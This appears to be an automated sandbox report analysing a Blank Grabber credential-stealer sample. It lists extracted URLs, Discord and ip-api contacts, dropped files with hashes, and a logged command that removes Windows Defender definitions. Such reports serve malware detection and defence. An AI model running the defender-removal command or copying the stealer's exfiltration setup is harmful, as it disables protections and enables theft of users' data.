                  https://html.spec.whatwg.org/multipage/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ifeng.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.zhihu.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000002D.00000002.1611004763.0000014D1A58A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://oneget.orgXpowershell.exe, 0000002D.00000002.1546305256.0000014D0BB13000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.iana.org/time-zones/repository/tz-link.htmlSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1350868217.0000016197390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1349900990.0000016197390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1350081558.0000016196FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.comSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1372272672.00000161970AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.gofile.io/getServerSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exefalse
                  • URL Reputation: safe
                  		unknown
                  https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1544534122.0000028190078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1611004763.0000014D1A6CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1546305256.0000014D0BE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1611004763.0000014D1A58A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000002D.00000002.1546305256.0000014D0BB13000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.moziSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://sectigo.com/CPS0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, rar.exe.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.amazon.co.uk/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.thawte.com0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329121115.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://json.orgSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1351974107.0000016196DCF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.wykop.pl/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://twitter.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764538565.0000016196A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.olx.pl/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.mozilla.org/products/firefoxSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1376271059.00000161970EA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1377195618.00000161970EF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://google.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764538565.0000016196A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379967159.0000016197320000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970B3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  208.95.112.1
                  		ip-api.comUnited States
                  		53334TUT-ASUSfalse
                  162.159.135.232
                  		discord.comUnited States
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1446241
                  Start date and time:2024-05-23 01:35:17 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:95
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@144/56@2/2
                  EGA Information:
                  • Successful, ratio: 60%
                  HCA Information:
                  • Successful, ratio: 94%
                  • Number of executed functions: 109
                  • Number of non-executed functions: 153
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 172.217.23.99
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 8788 because it is empty
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • VT rate limit hit for: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:36:12API Interceptor151x Sleep call for process: powershell.exe modified
                  19:36:15API Interceptor5x Sleep call for process: WMIC.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  New Inquiry RFQ.NO2015.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  V4zX3cdlet.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  Tender for Quote_MYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  BBVA__Aviso_de_Pago_pdf.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                  • ip-api.com/line/?fields=hosting
                  h0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  FMC Order No22052468.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  162.159.135.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                  • discord.com/admin.php
                  18561381.exeGet hashmaliciousRedLineBrowse
                  • discord.com/channels/948610961449816084/948610961449816086/948611091527774228

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  discord.comhttp://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                  • 162.159.138.232
                  SecuriteInfo.com.Other.Malware-gen.12648.25881.elfGet hashmaliciousUnknownBrowse
                  • 162.159.136.232
                  SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                  • 162.159.128.233
                  SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                  • 162.159.138.232
                  SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                  • 162.159.136.232
                  SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                  • 162.159.135.232
                  schtasks.exeGet hashmaliciousBlank GrabberBrowse
                  • 162.159.136.232
                  http://cf-ipfs.com/ipfs/Qmb8ZxH6YcdjvixfVo3yE3hHm5CNzVAQFSfFDavjywVtYk/gttrindeed.htmlGet hashmaliciousUnknownBrowse
                  • 162.159.135.232
                  TS-240519-Blank1.exeGet hashmaliciousBlank GrabberBrowse
                  • 162.159.128.233
                  TS-240519-Blank2.exeGet hashmaliciousBlank GrabberBrowse
                  • 162.159.135.232
                  ip-api.comdocumentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  New Inquiry RFQ.NO2015.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  V4zX3cdlet.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  Tender for Quote_MYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  BBVA__Aviso_de_Pago_pdf.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                  • 208.95.112.1
                  https://link.mail.beehiiv.com/ss/c/u001.CEz1YkosQOgW_2I8tJTUL2rOicXJM7RxHjhrRWDeG5g4TuF3JnRWze3ceZ9WwqET/46i/a2N64yc5RA-IsZ3qpS7tjQ/h6/h001.j_JgYHgZoY9wighPNvNrp_oY-YX91EMEgYGT_rGLcUUGet hashmaliciousUnknownBrowse
                  • 51.77.64.70
                  h0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttps://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxyGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.196.150
                  https://pro-openxsea.firebaseapp.com/Get hashmaliciousUnknownBrowse
                  • 104.17.25.14
                  http://segurogestionvirtual.brizy.site/Get hashmaliciousUnknownBrowse
                  • 104.17.208.58
                  https://worker-noisy-base-d6b4.monicaajanusss.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  https://actualizacionesban-colombia.brizy.site/Get hashmaliciousUnknownBrowse
                  • 172.67.74.186
                  http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                  • 104.21.31.155
                  http://danaa-gratis.000webhostapp.com/Get hashmaliciousUnknownBrowse
                  • 104.17.2.184
                  http://x6-1f3.pages.dev/appeal_case_ID/Get hashmaliciousUnknownBrowse
                  • 172.66.47.178
                  https://inboxexchangeservice.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                  • 188.114.97.3
                  https://claiim-dana-kagett.clikweb.my.id/Get hashmaliciousUnknownBrowse
                  • 104.21.18.95
                  TUT-ASUSdocumentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  New Inquiry RFQ.NO2015.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  V4zX3cdlet.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  Tender for Quote_MYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  BBVA__Aviso_de_Pago_pdf.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1
                  jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                  • 208.95.112.1
                  h0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  FMC Order No22052468.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pydMethodReveal.exeGet hashmaliciousBlank GrabberBrowse
                    SecuriteInfo.com.Python.Muldrop.18.11526.25283.exeGet hashmaliciousBlank GrabberBrowse
                      SecuriteInfo.com.Python.Muldrop.18.11526.25283.exeGet hashmaliciousBlank GrabberBrowse
                        F-M-E.exeGet hashmaliciousUnknownBrowse
                          Electron_V6.exeGet hashmaliciousBlank GrabberBrowse
                            Nezur_V2.exeGet hashmaliciousBlank GrabberBrowse
                              Molasses.exeGet hashmaliciousBlank GrabberBrowse
                                x8Rh3L1DiO.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                  Galaxy.exeGet hashmaliciousBlank GrabberBrowse
                                    f1.exeGet hashmaliciousBlank GrabberBrowse
                                      C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dllmav17final.exeGet hashmaliciousXmrigBrowse
                                        file.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                            access_version_x32-64_pack.exeGet hashmaliciousUnknownBrowse
                                              https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                                Wave32bit.exeGet hashmaliciousUnknownBrowse
                                                  Wave32bit.exeGet hashmaliciousUnknownBrowse
                                                    DeltaX.exeGet hashmaliciousXmrigBrowse
                                                      Arceus.exeGet hashmaliciousXmrigBrowse
                                                        DeltaX.exeGet hashmaliciousXmrigBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................

                                                          C:\Users\user\AppData\Local\Temp\? ? \Display (1).png

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):705938
                                                          Entropy (8bit):7.926485816467803
                                                          Encrypted:false
                                                          SSDEEP:12288:ri14OwteQnWA/P/2naEFKV5x6UMmcCG01Cf2JyRx+7ozFteX7Dz/N1DFHOqwlBPZ:riXZAuaEe5xGiGv2Yx4MTeX7HrD5ORnR
                                                          MD5:D6E5D1CF115BC4A4EFE1D713E5F024AA
                                                          SHA1:C5E4E4352B1494909930BD38DE2D822BCDC423F7
                                                          SHA-256:F596346E48EB1C5A840051331BE043E69651DDB5EC0154B5FA5C9EF8650BF4BD
                                                          SHA-512:EA004DF6CC21923F4AE49B596B53C148E046804343F05B320C31D591EC3EF371A42D47A068BDCDBB663D64A37D12813C4376DFF0CE2D1DAD459C56829F7688CB
                                                          Malicious:false
                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.w.m..{N....q./..y..f......mu..7.....'o@B.!...@..od..C ....q..[..@.....k..u\.[.T7..\.2.9..[..+.n.N}5.....R.l..kE.o{..J_.'.....3.1e......s..^.D.Yd..m.k......'h..Bj}...}.F......G.....11.>.j8..UJk...1v.x.'.#m....1u.?...*.>..}l..yr ...:.<.06M..=>-.....GGJ.....XA...O....j....i.s.M....=.............y.a......M..>+k~9.c....O...O...........M..G..0......}.k.>|wO.?.3...2.{W..ug...}..L...b...{...5.~<......>p[...O..{..oM.......4o.m.........[b.......+.oy.1{.w.9..g.vSZ..->nq.....]+..fqc..l.....{o.h<..MMl..nK.v.=v.!.....}..>.....9.`.....Z.....;..v.>.......6../x.}6.i,....Mi..,.v>1.]@..[.\.....>.m......hK...K.}k..oks.\.io}u.[..Mi...}...l....VW...W.v|k.<.\..........`{....-/.y.&3o[......c~.}.....o}Un5Vl.V.....Wd..s.li.-l.P.l..2._ncrl...o~e..#6...].................m...}........XK.p3[...mb..x....i|.]...'.3..-....|>..z..........ru=....=..X,.k.....rl.-.

                                                          C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                          Download File
                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):894
                                                          Entropy (8bit):3.113609388377711
                                                          Encrypted:false
                                                          SSDEEP:12:Q58KRBubdpkoPAGdjrlsXiRk9+MlWlLehW51ICEsXiw:QOaqdmOFdjrl8z+kWResLIN8Z
                                                          MD5:CF9649E07AF853959C090C28A9152A89
                                                          SHA1:F647D908173987771C5223096289031901558FE8
                                                          SHA-256:18ED40D3E617C31DEA2B6444622D3D99E3DEC0C21677F8CE0272889453A42A1C
                                                          SHA-512:1ED266F9E11D01A87BC928696DFC517B4F0E4994BEA1BD68D0A29E04E34953B47336F60DD1FE438DFFBA52E63408D8BEDE7A1E60BCE6F3EC58209D53287F43D1
                                                          Malicious:false
                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 2.2. .. 2.0.2.4. .1.9.:.3.6.:.3.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 2.2. .. 2.0.2.4. .1.9.:.3.6.:.3.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                          C:\Users\user\AppData\Local\Temp\R9FJX.zip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                          File Type:RAR archive data, v5
                                                          Category:dropped
                                                          Size (bytes):755422
                                                          Entropy (8bit):7.999771841752418
                                                          Encrypted:true
                                                          SSDEEP:12288:zUxTIMlGabBMZ5SX37Je/NUiGkHmKkjnekQAGQ2YqihYLa+RqZ7g742R0J:MTIMlG7r239eWiHmKWewGQY2aUZUR0J
                                                          MD5:F0FBE0DCFC39060F546918164A8C9313
                                                          SHA1:747A50E9FD83EDBC67E96E1B335F687AF7BC51AB
                                                          SHA-256:99A22CB334DC2E8C77017CBF14D0597ADC088EC8B5152598E566736D644C36A7
                                                          SHA-512:5EE335B929326C2CFC7ED8AA42CFDDDA34EAA7F9D017C0ACC7B664E942D2889E13F5432A712603739E8F6918E37C0CC2BBCEC13B317229BD508287BB7B9FA1DF
                                                          Malicious:true
                                                          Preview:Rar!....bhS.!......X.G(".....w%A._......1.P..........._...S.h..v.....{.=.#s.%.....2..YJ........[{[... ...Z...........0.k}.e..a...)jy.0O:/])*..).HW#..&|-?..'....._.... Y...!.Q..0}.T<...Y..}...i./=e.....:..U.g..?...........R...1..}.........g..I..A.Us.K.f.....~.Hh.@n.d...J.C[`..W...H.....3.M....+c...... !W0gd.3;.9A."./.=....>\q."5.!z..<k...9.8<d....Nj<.l.H....yX=j. ..d..W.....*"7.,..|.-z....8.k....]....f.....ha.@....O_;......_X....fn~......{F.#....|U.~Q..`T..".2h.|b.8.bX.g5jL....j...YK]..94T.d...)..'[.'.&]\...G...ya...n....?...@...h...=%...............C.S6..n.....&.px.q...4..;.$.........%..z..B.]oO...Y..]%.R7m.o.z1q`..s....D(...f..}K..MM..:hF}....=....#..d.....5F..z.<..*....y...8.g......n..\*..l.YV....4xJ=[..C..Q....s.z.A.61n....NH2..j*_q..#.$.........3@....l.M#P......M...(.>.f.;J.u\^....T.c...%.%...7..rq]...r.........4s</;.Y..2s40&.....1/wk?..@.....k......Nv.eM......kA..^QG.~....4U....P..1.Y......t~#..-:8...MaXs:...o.&.6.vrAe..{e..D..Y

                                                          C:\Users\user\AppData\Local\Temp\RES3733.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu May 23 01:16:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1372
                                                          Entropy (8bit):4.097862651087334
                                                          Encrypted:false
                                                          SSDEEP:24:HSq9UjwZLcxIuwZH8MFwK9GMwZnMhNwI+ycuZhNdAakS8lPNnqS+d:cjwZluwZcFKdwZnMhm1ul+a3qqSe
                                                          MD5:3E662A6A58B9AD70828BD4FE05B0E130
                                                          SHA1:2F127C85E06445B4ACC4469266CE577BD06F6311
                                                          SHA-256:5C3B71BB73E2D15FB0D44045369219B74D9A8E45E5FBF0A7F8534DF30B65363A
                                                          SHA-512:F761FEE65736E7FBCF54E7DE82F982D4FCE64F6C85E3D604AAB6756992732CE7DA7C83E81F8D8DEB705C90881A4BF8B07F347EB8AB6A967DE785551048942BA4
                                                          Malicious:false
